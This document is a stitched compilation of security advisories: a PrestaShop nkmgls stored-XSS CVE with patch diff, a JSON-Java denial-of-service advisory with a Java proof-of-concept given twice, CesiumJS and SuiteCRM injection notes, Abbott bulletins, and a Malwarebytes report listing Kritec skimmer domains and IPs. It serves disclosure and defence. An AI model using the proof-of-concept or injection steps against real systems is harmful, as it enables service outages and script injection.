Nukium nkmgls before version 3.0.2 is vulnerable to Cross Site Scripting (XSS) via NkmGlsCheckoutModuleFrontController::displayAjaxSavePhoneMobile.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org** or visit https://security-presta.org for more information.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “NKM GLS” (nkmgls) up to version 3.0.1 from Nukium for PrestaShop, a guest (authenticated customer) can perform XSS injection of type 2 (stored XSS) from FRONT to BACK (F2B) of Category 2 within the funnel order in affected versions.

Note : To succeed in this exploit, the red team needs to pay to convert a cart into a valid order with GLS carrier and require the administrator of the PS to check a specific screen within its backoffice.

**Summary**

*   **CVE ID**: CVE-2023-47309
*   **Published at**: 2023-11-14
*   **Platform**: PrestaShop
*   **Product**: nkmgls
*   **Impacted release**: <= 3.0.1 (3.0.2 fixed the vulnerability)
*   **Product author**: Nukium
*   **Weakness**: CWE-79
*   **Severity**: critical (9.0)

**Description**

As all XSS type 2 (Stored XSS) F2B (Front to Back), there are two steps and a prerequisite.

Prerequisite :

*   The field phone_mobile within table gls\_cart\_carrier suffers from a type varchar(255) which is large enough to allow dangerous XSS payloads.

Steps :

*   The method NkmGlsCheckoutModuleFrontController::displayAjaxSavePhoneMobile does not properly clean the parameter gls_customer_mobile. pSQL is useless against XSS which exploits HTML tag attributes (Category 2 according to OWASP - pSQL only neutralized Category 1 thanks to its strip\_tags).
*   The output in the backoffice is not escaped in the related smarty template that uses it.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: low
*   **User interaction**: required
*   **Scope**: changed
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**Possible malicious usage**

*   Unlock design critical vulnerabilities, see this.

**Patch from 3.0.2**

    --- a/controllers/front/checkout.php
    +++ b/controllers/front/checkout.php
    
     <?php
     
    +use Nukium\GLS\Common\Exception\GlsException;
     use Nukium\GLS\Common\Legacy\GlsController;
     
     require_once dirname(__FILE__) . '/../../vendor/autoload.php';
    @@ -25,54 +26,63 @@ class NkmGlsCheckoutModuleFrontController extends ModuleFrontController
                 'message' => ''
             );
     
    -        $phone_mobile = Tools::getValue('gls_customer_mobile');
    -        $id_carrier = Tools::getValue('id_carrier');
    -        $is_relay = Tools::getValue('is_relay');
    -
    -        if ($cart && !empty($id_carrier)) {
    -            /**
    -             * Récupération du code produit GLS (dépend du transporteur sélectionné uniquement dans ce cas de figure
    -             * car l'enregistrement est appelé uniquement pour les transporteurs gls13h ou glsrelais)
    -             */
    -            $customer_address = new Address($cart->id_address_delivery);
    -            $customer_country_iso = '';
    -            if ($customer_address) {
    -                $customer_country_iso = Country::getIsoById($customer_address->id_country);
    +        try {
    +            $phone_mobile = Tools::getValue('gls_customer_mobile');
    +            if (!Validate::isPhoneNumber($phone_mobile)) {
    +                throw new GlsException($this->module->l('Please fill-in a valid mobile number (e.g. +XXXXXXXXXXX or 0XXXXXXXXX).', 'nkmgls'));
                 }
    -            $gls_product = $this->module->getGlsProductCode(
    -                (int)$id_carrier,
    -                $customer_country_iso
    -            );
     
    -            $query = new DbQuery();
    -            $query->select('c.*')
    -                ->from('gls_cart_carrier', 'c')
    -                ->where('c.`id_customer` = ' . (int) $cart->id_customer)
    -                ->where('c.`id_cart` = ' . (int) $cart->id);
    -
    -            if (Db::getInstance()->getRow($query)) {
    -                $sql = 'UPDATE ' . _DB_PREFIX_ . 'gls_cart_carrier SET `customer_phone_mobile`=\'' . pSQL($phone_mobile) . '\', `id_carrier`=' . (int) $id_carrier . ', `gls_product`=\'' . pSQL($gls_product) . '\'';
    -                // reset all data except mobile and gls_product
    -                if (! $is_relay) {
    -                    $sql .= ',`parcel_shop_id` = NULL, `name` = NULL, `address1` = NULL, `address2` = NULL, `postcode` = NULL,
    -                        `city` = NULL, `phone` = NULL, `phone_mobile` = NULL, `id_country` = NULL, `parcel_shop_working_day` = NULL';
    +            $id_carrier = Tools::getValue('id_carrier');
    +            $is_relay = Tools::getValue('is_relay');
    +
    +            if ($cart && !empty($id_carrier)) {
    +                /**
    +                 * Récupération du code produit GLS (dépend du transporteur sélectionné uniquement dans ce cas de figure
    +                 * car l'enregistrement est appelé uniquement pour les transporteurs gls13h ou glsrelais)
    +                 */
    +                $customer_address = new Address($cart->id_address_delivery);
    +                $customer_country_iso = '';
    +                if ($customer_address) {
    +                    $customer_country_iso = Country::getIsoById($customer_address->id_country);
                     }
    -                $sql .= ' WHERE `id_customer`=' . (int) $cart->id_customer . ' AND `id_cart`=' . (int) $cart->id;
    +                $gls_product = $this->module->getGlsProductCode(
    +                    (int)$id_carrier,
    +                    $customer_country_iso
    +                );
    +
    +                $query = new DbQuery();
    +                $query->select('c.*')
    +                    ->from('gls_cart_carrier', 'c')
    +                    ->where('c.`id_customer` = ' . (int) $cart->id_customer)
    +                    ->where('c.`id_cart` = ' . (int) $cart->id);
    +
    +                if (Db::getInstance()->getRow($query)) {
    +                    $sql = 'UPDATE ' . _DB_PREFIX_ . 'gls_cart_carrier SET `customer_phone_mobile`=\'' . pSQL($phone_mobile) . '\', `id_carrier`=' . (int) $id_carrier . ', `gls_product`=\'' . pSQL($gls_product) . '\'';
    +                    // reset all data except mobile and gls_product
    +                    if (! $is_relay) {
    +                        $sql .= ',`parcel_shop_id` = NULL, `name` = NULL, `address1` = NULL, `address2` = NULL, `postcode` = NULL,
    +                            `city` = NULL, `phone` = NULL, `phone_mobile` = NULL, `id_country` = NULL, `parcel_shop_working_day` = NULL';
    +                    }
    +                    $sql .= ' WHERE `id_customer`=' . (int) $cart->id_customer . ' AND `id_cart`=' . (int) $cart->id;
     
    -                if (Db::getInstance()->Execute($sql)) {
    -                    $return['result'] = true;
    -                } else {
    -                    $return['message'] = $this->module->l('Unexpected error occurred.', self::L_SPECIFIC);
    -                }
    -            } else {
    -                if (Db::getInstance()->Execute('INSERT INTO ' . _DB_PREFIX_ . 'gls_cart_carrier
    -                    (`id_customer`, `id_cart`, `id_carrier`, `gls_product`, `customer_phone_mobile`)
    -                    VALUES (' . (int) $cart->id_customer . ', ' . (int) $cart->id . ', ' . (int) $id_carrier . ', \'' . pSQL($gls_product) . '\', \'' . pSQL($phone_mobile) . '\')')) {
    -                    $return['result'] = true;
    +                    if (Db::getInstance()->Execute($sql)) {
    +                        $return['result'] = true;
    +                    } else {
    +                        throw new GlsException($this->module->l('Unexpected error occurred.', self::L_SPECIFIC));
    +                    }
                     } else {
    -                    $return['message'] = $this->module->l('Unexpected error occurred.', self::L_SPECIFIC);
    +                    if (Db::getInstance()->Execute('INSERT INTO ' . _DB_PREFIX_ . 'gls_cart_carrier
    +                        (`id_customer`, `id_cart`, `id_carrier`, `gls_product`, `customer_phone_mobile`)
    +                        VALUES (' . (int) $cart->id_customer . ', ' . (int) $cart->id . ', ' . (int) $id_carrier . ', \'' . pSQL($gls_product) . '\', \'' . pSQL($phone_mobile) . '\')')) {
    +                        $return['result'] = true;
    +                    } else {
    +                        throw new GlsException($this->module->l('Unexpected error occurred.', self::L_SPECIFIC));
    +                    }
                     }
                 }
    +        } catch (GlsException $e) {
    +            $return['result'] = false;
    +            $return['message'] = $e->getMessage();
             }
     
             header('Content-Type: application/json');
    

    --- a/views/templates/admin/gls_label/label_list.tpl
    +++ b/views/templates/admin/gls_label/label_list.tpl
    
    @@ -186,7 +186,7 @@
                                                             {l s='Mobile' mod='nkmgls'}
                                                         </label>
                                                         <div>
    -                                                        <input class="form-control" type="tel" name="mobile" value="{if !empty($tr.customer_phone_mobile)}{$tr.customer_phone_mobile}{else}{$tr.customer_phone}{/if}" required="required" />
    +                                                        <input class="form-control" type="tel" name="mobile" value="{if !empty($tr.customer_phone_mobile)}{$tr.customer_phone_mobile|escape:'html':'UTF-8'}{else}{$tr.customer_phone|escape:'html':'UTF-8'}{/if}" required="required" />
                                                         </div>
                                                     </div>
                                                     {if $tr.id_country|in_array:$cee_countries === false}
    @@ -210,10 +210,10 @@
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **nkmgls**.
*   Systematically escape characters ‘ “ < and > by replacing them with HTML entities and applying strip\_tags - Smarty and Twig provide auto-escape filters : \`\`\`diff
*   Smarty: {$value.comment
    
    escape:’html’:’UTF-8’}
    
*   Twig: {{value.comment|e}}(without backslashes) \`\`\`
*   Limit to the strict minimum the length’s value in database - a database field that allow 10 characters (varchar(10)) is far less dangerous than a field that allows 40+ characters (use cases that can exploit fragmented XSS payloads are very rare)
*   Configure CSP headers (content security policies) by listing external domains allowed to load assets (such as js files) or being called in XHR transactions (Ajax).
*   If applicable: check against all your frontoffice’s uploaders, uploading files that will be served by your server that mime type application/javascript (like every .js natively) must be strictly forbidden as it must be considered as dangerous as PHP files.
*   Activate OWASP 941’s rules on your WAF (Web application firewall) - be warned that you will probably break your frontoffice/backoffice and you will need to preconfigure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-24

Issue discovered during a code review by TouchWeb.fr

2023-02-24

Contact the author who will provide a patch within 4 hours

2023-02-24

V3.0.2 available on https://store.nukium.com/ and https://addons.prestashop.com/

2023-03-10

Recontact author about the publication of the vulnerability

2023-03-12

Author completes the diff of this present CVE and asks for a delay to publish

2023-05-05

Recontact author about the publication of the vulnerability

2023-05-17

Author ask for another delay before publication

2023-07-15

Recontact author about the publication of the vulnerability

2023-09-17

Recontact author about the publication of the vulnerability

2023-09-30

Recontact author about the publication of the vulnerability

2023-10-30

Inform the author about the publication of the vulnerability

2023-10-30

Request a CVE ID

2023-11-08

Received CVE ID

2023-11-14

Publish this security advisory

**Links**

*   Author product page
*   PrestaShop addons product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-47309: [CVE-2023-47309] Improper Neutralization of Input During Web Page Generation in Nukium - NKM GLS module for PrestaShop

### Summary
A denial of service vulnerability in JSON-Java was discovered by [ClusterFuzz](https://google.github.io/clusterfuzz/).  A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using `\` to escape special characters, including `\` itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of `\` characters in the escaped string.

### Severity
High - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.

### Proof of Concept
```java
package orgjsonbug;

import org.json.JSONObject;

/**
 * Illustrates a bug in JSON-Java.
 */
public class Bug {
  private static String makeNested(int depth) {
    if (depth == 0) {
      return "{\"a\":1}";
    }
    return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}";
  }

  public static void main(String[] args) {
    String input = makeNested(30);
    System.out.printf("Input string has length %d: %s\n", input.length(), input);
    JSONObject output = new JSONObject(input);
    System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output);
  }
}
```
When run, this reports that the input string has length 367. Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.

### Further Analysis
The issue is fixed by [this PR](https://github.com/stleary/JSON-java/pull/759).

### Timeline
**Date reported**: 07/14/2023
**Date fixed**: 
**Date disclosed**: 10/12/2023

**Summary**

A denial of service vulnerability in JSON-Java was discovered by ClusterFuzz. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using \ to escape special characters, including \ itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of \ characters in the escaped string.

**Severity**

High - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.

**Proof of Concept**

package orgjsonbug;

import org.json.JSONObject;

/\*\*
 \* Illustrates a bug in JSON-Java.
 \*/
public class Bug {
  private static String makeNested(int depth) {
    if (depth == 0) {
      return "{\\"a\\":1}";
    }
    return "{\\"a\\":1;\\t\\0" + makeNested(depth - 1) + ":1}";
  }

  public static void main(String\[\] args) {
    String input = makeNested(30);
    System.out.printf("Input string has length %d: %s\\n", input.length(), input);
    JSONObject output = new JSONObject(input);
    System.out.printf("Output JSONObject has length %d: %s\\n", output.toString().length(), output);
  }
}

When run, this reports that the input string has length 367. Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.

**Further Analysis**

The issue is fixed by this PR.

**Timeline**

**Date reported**: 07/14/2023  
**Date fixed**:  
**Date disclosed**: 10/12/2023

**References**

*   GHSA-4jq9-2xhw-jpx7
*   https://nvd.nist.gov/vuln/detail/CVE-2023-5072
*   stleary/JSON-java#758
*   stleary/JSON-java#771
*   stleary/JSON-java#759
*   stleary/JSON-java@60662e2

GHSA-4jq9-2xhw-jpx7: Java: DoS Vulnerability in JSON-JAVA

A cross-site scripting (XSS) vulnerability in CesiumJS v1.111 allows attackers to execute arbitrary code in the context of the victim's browser via sending a crafted payload to /container_files/public_html/doc/index.html.

Embed

What would you like to do?

CesiumJS v1.111 DOM based XSS

\- CVE ID

not yet assigned

\- Name of affected product and versions

https://github.com/CesiumGS/cesium

version <= 1.111

\- Problem type

Attacker can execute arbitrary javascript code in victim's browser by sending specifically crafted url that exploits DOM based XSS in container\_files/public\_html/doc/index.html.

\- Description

There is a DOM based XSS vulnerability in Apps/Sandcastle/standalone.html due to creating script tag with unsanitzed location.hash.

CVE-2023-48094: CesiumJS v1.111 DOM based XSS

 Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

**Description**

The application accepts PDF files with JavaScript code embedded which results in JavaScript code injection and execution. This vulnerability allows the adversary to upload PDF files with malicious content and execute them.

**Proof of Concept**

    1. Login as a user
    2. Go to Collaboration > Documents > Create Documents
    3. Upload a malicious PDF file and click save
    4. Go to another user account (could be admin) and view the same file and the payload will get executed
    5. Repeat the same process for another malicious file
    

POC Video

Malicious PDF File 1

Malicious PDF File 2

JavaScript Code of Malicious PDF File 1

JavaScript Code of Malicious PDF File 2

This has been also tested on the demo. Demo POC

**Impact**

This vulnerability leads to JavaScript Code Execution which could make arbitrary changes to the content of the uploaded PDF and much more.

More vulnerabilities could occur according to the information mentioned here: PDF Functions

CVE-2023-6125: JavaScript Code Execution in PDF in suitecrm

In Abbott ID NOW before 7.1, settings can be modified via physical access to an internal serial port.

**Access the most recent product security updates from Abbott and its suppliers here.****NOVEMBER 14, 2023****Product Security Bulletin: ID Now**

Abbott has reviewed the level of potential impact of this vulnerability on product performance and safety, and has taken appropriate steps to mitigate this issue in its latest software update, v7.1.

****JANUARY 5, 2022******Product Security Bulletin: Apache Log4j**

Abbott is aware of the recently discovered remote code execution vulnerability impacting Apache Log4j, a logging tool commonly used in Java-based software applications.  

**DECEMBER 8, 2020****Product Security Bulletin: Amnesia:33**

Abbott is proactively monitoring developments related to the recently identified vulnerabilities in third-party open-source networking software components (TCP/IP stacks), commonly referred to as "Amnesia:33".

****SEPTEMBER 7, 2020******Product Security Bulletin: Treck TCP/IP "Ripple 20"**

Abbott is proactively monitoring developments related to the recently identified vulnerabilities in the Treck TCP/IP stack, commonly referred to as"Ripple 20". According to published reports, including the CISA Alert1, the security vulnerabilities in the software that supports network connectivity could allow remote code execution or exposure of sensitive information.

****OCTOBER 8, 2020******Product Security Bulletin: "Sweyntooth" BLE**

Abbott is proactively monitoring developments related to the recently identified vulnerabilities in third-party Bluetooth Low Energy (BLE) components, commonly referred to as “SweynTooth”. According to published reports, including the CISA Alert1, the vulnerabilities expose flaws in specific BLE components from multiple chip manufacturers that could allow an unauthorized user to interrupt BLE communication or bypass security.

****NOVEMBER 2, 2020******Product Security Bulletin: Microsoft CryptoAPI Spoofing**

Abbott is monitoring developments related to the recently published CISA Alert (Alert AA20-014A) identifying vulnerabilities in Microsoft’s Windows CryptoAPI, an application programming interface that enables developers to secure Windows-based applications. 

****JULY 7, 2020******Product Security Bulletin: VxWorks IPNet Vulnerabilities**

Abbott is monitoring developments related to recently published advisory (ICSA-19-211-01) identifying 11 IPNet vulnerabilities in Wind River’s VxWorks and other widely used Real Time Operating Systems (RTOSs). These vulnerabilities were reported by security researchers at Armis and are sometimes referred to as “Urgent/11”. RTOSs are used in a wide variety of products, including printers, routers, medical devices, firewalls, VOIP phones and industrial controllers.

****MAY 22, 2019******Product Security Bulletin: Microsoft RDP**

Abbott is aware of and actively monitoring updates related to the Remote Desktop Services Remote Code Execution vulnerability (CVE-2019-0708), which was announced by Microsoft on May 14, 2019.

****JANUARY 12, 2018******Product Security Bulletin: Meltdown/Spectre**

The National Health Information Sharing and Analysis Center (NH-ISAC) has issued an advisory to the industry regarding Meltdown and Spectre, two new widespread cybersecurity vulnerabilities impacting processors in nearly every computer and mobile device.

CVE-2023-47262: Product Advisories

We've seen a particular card skimming campaign really pick up pace lately. With hundreds of stores compromised, you may come across it if you shop online this holiday season.

As we head into shopping season, customers aren’t the only ones getting excited. More online shopping means more opportunities for cybercriminals to grab their share using scams and data theft.

One particular threat we’re following closely and expect to increase over the next several weeks is credit card skimming. Online stores are not always as secure as you might think they are, and yet you need to hand over your valuable credit card information in order to buy anything.

When a merchant website is hacked, any purchase made has the potential of being intercepted by bad actors. Often, the malicious code is right underneath the surface and yet completely invisible to shoppers.

One particular skimming campaign we have been following picked up the pace drastically in October after a lull during the summer. With hundreds of stores compromised, you may come across it if you shop online on a regular basis.

**The Kritec campaign**

We first discovered this credit card skimming operation back in March 2023, as it stood out from the rest due to its large volume. The threat actors were also taking the time to customize their skimmer for each victim site with very convincing templates that were even localized in several languages.

The experience was so smooth and seamless that it made it practically impossible for online shoppers to even realize that their credit card information had just been stolen.

**Threat actors ramp up their activity just in time for the holiday season**

In April this skimming campaign reached a peak and then slowed down during the summer. However it came back, increasing to its highest volume in October. We measured this activity based on the number of newly registered domain names attributed to this threat actor.

The infrastructure is located on the IT WEB LTD network (ASN200313) registered in the British Virgin Islands.

**How to shop safely online**

If you are shopping online, and especially via smaller merchants (i.e. not Amazon, Walmart, etc), you absolutely need to be extra careful. Unless you are able to perform a full website audit yourself, you simply can’t be sure that the platform hasn’t been compromised.

Having said that, if the website looks like it hasn’t been maintained in a while (for example it is displaying outdated information, such as ”Copyright 2018′) you probably should stay away from it. Most compromises happen because a website’s content management system (CMS) and its plugins are outdated and vulnerable.

There are tools that can also detect malicious code embedded into websites. Most antivirus products offer some kind of web protection that detects malicious domains and IP addresses. But because threat actors are constantly swapping their infrastructure, it is also a good idea to have some kind of heuristic detection for things like malicious JavaScript snippets.

Malwarebytes Premium offers web protection and is complemented by the Malwarebytes Browser Guard extension for more advanced in-browser detection.

We are also publishing a list of the infrastructure that includes domains we had previously not seen but obtained via retrohunting, so that those can be included in community blocklists ingested by third-party products.

**Indicators of Compromise**

**Kritec domains**

oumymob\[.\]shop  
nujtec\[.\]shop  
lavutele\[.\]yachts  
tochdigital\[.\]pics  
gemdigit\[.\]pics  
vuroselec\[.\]quest  
bereelec\[.\]quest  
psyhomob\[.\]sbs  
antohub\[.\]shop  
kritec\[.\]pics  
daichetmob\[.\]sbs  
smestech\[.\]shop  
interytec\[.\]shop  
ribtech\[.\]shop  
podobadigit\[.\]quest  
yaknatec\[.\]pics  
stacstocuh\[.\]quest  
keistodigit\[.\]pics  
shumtech\[.\]shop  
metsimob\[.\]yachts  
hovarelec\[.\]shop  
vdoxdigit\[.\]pics  
vushtech\[.\]sbs  
tekeiteh\[.\]quest  
tastmob\[.\]yachts  
krasoticmob\[.\]space  
pyatiticdigt\[.\]shop  
frikctictempo\[.\]fun  
secreelec\[.\]shop  
yelyotech\[.\]pics  
statemob\[.\]yachts  
sviisdigit\[.\]quest  
garnimob\[.\]sbs  
povomob\[.\]shop  
dvojnatech\[.\]sbs  
petlelec\[.\]quest  
helotec\[.\]pics  
xiloditg\[.\]yachts  
paunit\[.\]pics  
rithdigit\[.\]cyou  
dayspiselec\[.\]quest  
uznatec\[.\]shop  
nespomob\[.\]sbs  
nebiltech\[.\]shop  
bufelec\[.\]yachts  
ledeehub\[.\]shop  
greentechify\[.\]digital  
ecosustain\[.\]digital  
innovate360\[.\]digital  
wellbeingtech\[.\]digital  
inspireworks\[.\]digital  
avtomob\[.\]sbs  
otkridigit\[.\]quest  
balacdigit\[.\]pics  
schetdigit\[.\]pics  
bantec\[.\]pics  
jantech\[.\]quest  
shotsmob\[.\]sbs  
podbotec\[.\]sbs  
shokomob\[.\]sbs  
resuelec\[.\]yachts  
xorotelec\[.\]quest  
rozkatech\[.\]yachts  
nasnamob\[.\]quest  
ensdigit\[.\]quest  
genlytec\[.\]us  
onitzech\[.\]sbs  
odintech\[.\]sbs  
rebomob\[.\]quest  
flattec\[.\]sbs  
noanotech\[.\]sbs  
fadyit\[.\]pics  
lielecef\[.\]cyou  
inlinedigital\[.\]pics  
fantodelt\[.\]sbs  
volosmob\[.\]pics  
zahidelt\[.\]sbs  
dychtech\[.\]shop  
samopotele\[.\]yachts  
stimob\[.\]pics  
jestmob\[.\]pics  
weitmob\[.\]shop  
poidelt\[.\]sbs  
perstech\[.\]shop  
telehub\[.\]shop  
projectmob\[.\]sbs  
imhoelec\[.\]yachts  
plactech\[.\]quest  
sakwohub\[.\]shop  
volonmob\[.\]sbs  
lehelec\[.\]yachts  
tochelec\[.\]quest  
prijetech\[.\]shop  
supermob\[.\]network  
eluntec\[.\]info  
chutech\[.\]works  
stonworks\[.\]vip  
hapermob\[.\]shop  
seletech\[.\]markets  
calcdigit\[.\]pics  
shellmob\[.\]fun  
valetec\[.\]pw  
votedigit\[.\]shop  
encit\[.\]yachts  
defimob\[.\]bar  
goponl\[.\]online  
yukmob\[.\]store  
tuchtoch\[.\]shop

sasaiso\[.\]cfd  
aifanul\[.\]yachts  
soplelec\[.\]pics  
wudutec\[.\]shop  
vonderdigit\[.\]quest  
mutelec\[.\]quest  
gemstec\[.\]yachts  
genertech\[.\]pw  
genstech\[.\]shop  
effecttec\[.\]shop  
bespitech\[.\]sbs  
otpusmob\[.\]shop  
yedelec\[.\]sbs  
chokdigit\[.\]pics  
poptec\[.\]sbs  
aurelec\[.\]shop  
stramdigital\[.\]yachts  
sotkelec\[.\]yachts  
funkomob\[.\]sbs  
beatmob\[.\]pics  
osobtech\[.\]yachts  
kruktech\[.\]shop  
volosmob\[.\]sbs  
provtec\[.\]shop  
dvanatech\[.\]yachts  
druzit\[.\]quest  
yololive\[.\]sbs  
bachitech\[.\]pics  
kamitac\[.\]shop  
karadigit\[.\]quest  
gachit\[.\]yachts  
yalomob\[.\]pics  
druzit\[.\]quest  
mopedigit\[.\]shop  
macsetech\[.\]online  
strajit\[.\]yachts  
istoretc\[.\]shop  
trepmob\[.\]sbs  
animtech\[.\]quest  
chekeelec\[.\]quest  
kinotec\[.\]pics  
zamlmob\[.\]pics  
leritgo\[.\]sbs  
autotec\[.\]shop  
helinit\[.\]yachts  
shpitech\[.\]quest  
seletmob\[.\]online  
hhfnsfsga\[.\]sbs  
dvanatech\[.\]yachts  
lemodigit\[.\]online  
ttewe\[.\]quest  
efromob\[.\]site  
selentech\[.\]click  
centridig\[.\]store  
timetok\[.\]online  
musatech\[.\]quest  
digitstel\[.\]site  
sintec\[.\]store  
eleconuch\[.\]click  
deletouch\[.\]shop  
topostock\[.\]shop  
dujetech\[.\]yachts  
fletmob\[.\]sbs  
semebit\[.\]online  
kontec\[.\]quest  
moldmob\[.\]site  
lemtok\[.\]store  
domelec\[.\]shop  
hemidigit\[.\]click  
teletoch\[.\]pics  
temtoch\[.\]site  
intescon\[.\]store  
genimmob\[.\]online  
teledomn\[.\]quest  
stemtec\[.\]click  
gemofab\[.\]store  
tenastoc\[.\]click  
kiligob\[.\]site  
pelstec\[.\]online  
vetitec\[.\]quest  
denlog\[.\]shop  
lemnidig\[.\]shop  
fasfad\[.\]site  
lishetoc\[.\]shop  
ruepliz\[.\]click  
stiornec\[.\]store  
daisnetech\[.\]site  
yavipustec\[.\]online  
bednedigit\[.\]quest  
sipletoc\[.\]site  
olinmasot\[.\]click  
verecey\[.\]quest  
oleketec\[.\]store  
etibuz\[.\]shop  
comepetec\[.\]click  
stiildig\[.\]store  
hemogom\[.\]online  
dzelonline\[.\]shop  
tuctec\[.\]site  
obogtec\[.\]quest  
moboed\[.\]icu  
shonowor\[.\]site  
idopos\[.\]shop  
mylase\[.\]click  
henove\[.\]store  
frodetraho\[.\]click  
tromtustec\[.\]quest  
bulkmob\[.\]store

tisimy\[.\]quest  
depeyo\[.\]online  
livepolitical\[.\]sbs  
shareeffectiv\[.\]yachts  
basewhit\[.\]quest  
deliverclos\[.\]online  
changeyellow\[.\]cfd  
writefederal\[.\]click  
dowonderful\[.\]store  
deliverclos\[.\]sbs  
stopfurther\[.\]sbs  
usespecial\[.\]quest  
startculturl\[.\]site  
followmilitry\[.\]cfd  
intesres\[.\]quest  
androton\[.\]online  
begistic\[.\]site  
heptombo\[.\]store  
felestech\[.\]click  
gelimog\[.\]online  
hasekytop\[.\]click  
dekrenof\[.\]quest  
gerelec\[.\]site  
beresor\[.\]store  
lenosmac\[.\]shop  
hustiontec\[.\]store  
teletouch\[.\]click  
pilozol\[.\]quest  
belmrs\[.\]click  
jetomob\[.\]shop  
gelenhan\[.\]online  
lokotec\[.\]quest  
plasmob\[.\]pics  
shumocom\[.\]site  
biposou\[.\]online  
golyter\[.\]shop  
cuvanil\[.\]quest  
trevago\[.\]site  
domog\[.\]shop  
sgolen\[.\]store  
vjevec\[.\]quest  
spilotich\[.\]online  
babtek\[.\]click  
vozvrec\[.\]store  
irlatok\[.\]shop  
vkiten\[.\]click  
golyadik\[.\]site  
oklasdon\[.\]online  
mihayam\[.\]shop  
cutele\[.\]shop  
hoohotic\[.\]click  
pubupu\[.\]quest  
genodigit\[.\]store  
djutech\[.\]online  
voouvdigit\[.\]site  
zizitok\[.\]shop  
ulyatec\[.\]quest  
tuchtok\[.\]site  
justlice\[.\]store  
enisemol\[.\]click  
tululudoc\[.\]online  
nogtech\[.\]site  
mageants\[.\]sbs  
deshvoc\[.\]store  
shumtech\[.\]shop  
metsimob\[.\]yachts  
bolotoc\[.\]store  
nepochtec\[.\]shop  
bibstele\[.\]online  
nechuvelec\[.\]click  
gastdigit\[.\]quest  
arastek\[.\]online  
galeglob\[.\]quest  
boroshtic\[.\]click  
prodovjtec\[.\]shop  
denetok\[.\]site  
kalomob\[.\]store  
avordic\[.\]site  
chasoc\[.\]quest  
jujoc\[.\]online  
helostop\[.\]shop  
zlakovos\[.\]click  
obomob\[.\]site  
miskotec\[.\]store  
shakorot\[.\]site  
nemojmob\[.\]online  
najitel\[.\]quest  
ragutech\[.\]shop  
pershtec\[.\]click  
nadoelec\[.\]space  
odnydigit\[.\]quest  
yamatel\[.\]store  
jezesec\[.\]quest  
samknut\[.\]click  
imperel\[.\]site  
pricetool\[.\]store  
donashhack\[.\]online  
chelotec\[.\]quest  
stelor\[.\]shop  
udamos\[.\]online  
kurkumin\[.\]click  
vedldeno\[.\]store  
oifilon\[.\]site  
igusfil\[.\]shop  
cosmafit\[.\]click  
tanuatech\[.\]quest  
ifilone\[.\]site  
sourite\[.\]online  
becasotec\[.\]site

**Kritec IPs**

195\[.\]242\[.\]110\[.\]102  
195\[.\]242\[.\]110\[.\]103  
195\[.\]242\[.\]110\[.\]112  
195\[.\]242\[.\]110\[.\]130  
195\[.\]242\[.\]110\[.\]131  
195\[.\]242\[.\]110\[.\]134  
195\[.\]242\[.\]110\[.\]135  
195\[.\]242\[.\]110\[.\]136  
195\[.\]242\[.\]110\[.\]137  
195\[.\]242\[.\]110\[.\]139  
195\[.\]242\[.\]110\[.\]143  
195\[.\]242\[.\]110\[.\]158  
195\[.\]242\[.\]110\[.\]162  
195\[.\]242\[.\]110\[.\]166  
195\[.\]242\[.\]110\[.\]168  
195\[.\]242\[.\]110\[.\]171  
195\[.\]242\[.\]110\[.\]172  
195\[.\]242\[.\]110\[.\]174  
195\[.\]242\[.\]110\[.\]179  
195\[.\]242\[.\]110\[.\]181  
195\[.\]242\[.\]110\[.\]182  
195\[.\]242\[.\]110\[.\]185  
195\[.\]242\[.\]110\[.\]186  
195\[.\]242\[.\]110\[.\]187  
195\[.\]242\[.\]110\[.\]188  
195\[.\]242\[.\]110\[.\]189  
195\[.\]242\[.\]110\[.\]190  
195\[.\]242\[.\]110\[.\]191  
195\[.\]242\[.\]110\[.\]196  
195\[.\]242\[.\]110\[.\]197  
195\[.\]242\[.\]110\[.\]205  
195\[.\]242\[.\]110\[.\]206  
195\[.\]242\[.\]110\[.\]231  
195\[.\]242\[.\]110\[.\]232  
195\[.\]242\[.\]110\[.\]235  
195\[.\]242\[.\]110\[.\]237  
195\[.\]242\[.\]110\[.\]24  
195\[.\]242\[.\]110\[.\]242  
195\[.\]242\[.\]110\[.\]25  
195\[.\]242\[.\]110\[.\]250  
195\[.\]242\[.\]110\[.\]251  
195\[.\]242\[.\]110\[.\]28  
195\[.\]242\[.\]110\[.\]3  
